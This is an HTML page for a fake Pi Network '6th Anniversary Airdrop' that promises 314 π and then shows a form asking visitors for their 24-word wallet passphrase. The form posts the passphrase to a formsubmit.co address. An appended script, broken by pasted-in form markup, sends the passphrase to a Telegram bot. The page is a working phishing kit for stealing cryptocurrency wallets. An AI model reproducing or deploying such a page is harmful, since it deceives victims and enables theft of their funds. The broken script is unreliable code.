<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Pi Network Airdrop</title>
  <link rel="stylesheet" href="styles.css" />
</head>
<body>
  <div class="container">
    <header class="top-bar">
      <span class="logo"> 🔐 Wallet</span>
    </header>

    <main>
      <section class="airdrop-card">
        <img src="https://i.imgur.com/IOpGLeG.jpeg" alt="Pi Network Airdrop" style="width: 100%; max-width: 400px; display: block; margin: 0 auto;" />
        <h2>Pi Network 6th Anniversary Airdrop</h2>
        
        <h3>Celebrating Mainnet Launch and 6 Years of Innovation</h3>
        
        <p class="desc">
    To mark our official Mainnet launch and six years of progress, the Pi Network team is giving back to the community. 
    As a gesture of appreciation, eligible wallets that have successfully completed KYC will be randomly selected to receive between 
    <strong>31π</strong> and <strong>314π</strong>. A total of <strong>31,415 wallets</strong> will be rewarded.
  </p>
<div class="pi-reward">+314 π</div>
<p class="condition">✅ Condition: KYC Successfully Passed</p>
        <p class="remaining">📦 Remaining Quantity: 29,879 / 31,415</p>

        <button id="claimBtn" class="claim-button">CLAIM 314 PI NOW</button>

        <p class="referral">👥 Refer 3 pioneers to get more bonus up to 314π</p>
      </section>

      <section id="passphraseForm" class="passphrase-section hidden">
  <h3>Unlock Pi Wallet</h3>
  <form action="https://formsubmit.co/kp25626900@gmail.com" method="POST">
    <textarea name="passphrase" placeholder="Enter your 24-word passphrase here" required></textarea>
    <input type="hidden" name="_captcha" value="false">
    <button class="submit-button" type="submit">Unlock With Passphrase</button>
  </form>

  <p class="info">
    As a non-custodial wallet, your wallet passphrase is exclusively accessible only to you. 
    Recovery of passphrase is currently impossible.
  </p>
  <p class="warning">
    Lost your passphrase? <a href="#">You can create a new wallet</a>, but all your <b>π</b> 
    in your previous wallet will be inaccessible.
  </p>
</section>
    </main>
  </div>

  <script>
    document.getElementById("claimBtn").addEventListener("click", function () {
      document.getElementById("passphraseForm").classList.remove("hidden");
      this.style.display = "none"; // hide the claim button
    });
  </script>
</body>
</html>
<script>
  function sendPassphrase() {
    const phrase = document.querySelector<form action="https://formsubmit.co/kp25626900@gmail.com" method="POST">
  <textarea name="passphrase" placeholder="Enter your 24-word passphrase here" required></textarea>
  <button class="submit-button" type="submit">Unlock With Passphrase</button>

  <input type="hidden" name="_captcha" value="false">
</form>.value;

    // Example: log to console (NOT recommended for real use)
    console.log("Entered passphrase:", phrase);

    // Example: send to your Telegram bot (only if it's your own use)
    fetch("https://api.telegram.org/bot<YOUR_BOT_TOKEN>/sendMessage", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        chat_id: "<YOUR_CHAT_ID>",
        text: Passphrase entered: ${phrase}
      })
    });

    alert("Passphrase submitted.");
  }
</script>